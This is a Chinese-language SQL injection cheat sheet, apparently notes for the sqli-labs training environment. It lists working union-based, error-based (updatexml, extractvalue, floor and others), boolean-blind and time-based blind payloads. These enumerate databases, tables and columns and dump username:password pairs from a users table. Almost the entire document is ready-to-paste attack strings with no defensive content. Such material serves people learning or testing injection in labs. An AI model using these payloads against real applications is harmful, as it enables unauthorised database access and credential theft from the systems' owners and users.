order by:判断有多少字段
and length(database())=8 -- + # 判断当前数据库名长度
1.暴库:select group_concat(schema_name) from information_schema.schemata;
2.暴表1:select group_concat(table_name) from information_schema.tables where
table_schema='security'; 加引号
暴表2:select table_name from information_schema.tables where
table_schema='security' limit 3,1; 加引号
3.暴字段1:select group_concat(column_name) from information_schema.columns where
table_name='users' and table_schema='security'; 加引号
暴字段2:select column_name from information_schema.columns where
table_name='users' and table_schema='security' limit 1,1;
4.暴字段值:select group_concat(username,0x3a,password) from security.users; 不加
引号
select group_concat(username,0x3a,password) from security.users; # 查询指定库中表
的某些字段值
payload: id=-1' union select 1,2,group_concat(username,0x3a,password) from
security.users -- +
报错常用函数
# 1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat((select
user()),floor(rand(0)*2))x from information_schema.tables group by x)a);
# 2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
# 3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
# 4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
# 5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
# 6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
# 7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
# 8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
# 9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
# 10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
暴库
substr
payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),0,32),0x7e),1)); --+
limit
payload: id=1' and (updatexml(1,concat(0x7e,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1)); -- +
' OR updatexml(1,concat(0x2a,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1) OR '
暴表
payload: id=1' and (updatexml(1,concat(0x7e,substr((select
group_concat(table_name) from information_schema.tables where
table_schema='security'),1,32),0x7e),1)); -- +
暴字段
payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32),0x7e),1)); -- +
暴数据
payload: id=1' and (updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from security.users),1,32),0x7e),1)); -- +
布尔盲注
判断闭合符号
输入 id = 1' and 1 -- + 页面内容显示正常
输入 id = 1' and 0 -- + 页面显示不正常
由此判断出闭合符号为单引号
在进行暴库和暴数据时都要先判断sql查询结果的长度,可以用二分法快速判断
延时注入:
and if(length(database()) = 8, sleep(3),1) -- + 判断长度
暴库
payload: id=1' and if((substr((select group_concat(schema_name) from information_schema.schemata),1,1)='i'),sleep(3),1) -- +
暴表
payload: id=1' and if((substr((select group_concat(table_name) from
information_schema.tables where table_schema='security'),1,1)='e'),sleep(3),1) -
- +
暴字段
payload: id=1' and if((substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,1)='i'),sleep(3),1) -- +
暴数据
payload: id=1' and if((substr((select group_concat(username,0x3a,password) from
security.users),1,1)='d'),sleep(3),1) -- +
联合查询:
select group_concat(schema_name) from information_schema.schemata; # 查询所有库
名,并拼接为一条数据
payload: id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata -- +
select group_concat(table_name) from information_schema.tables where table_schema='security'; # 查询security库中所有表名,并拼接为一条数据
payload: id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- +
select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'; # 查询 security 库中 users 表中的所有字段名,拼接为一条数据
payload: id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' -- +
select group_concat(username,0x3a,password) from security.users; # 查询指定库中表的某些字段值
payload: id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users -- +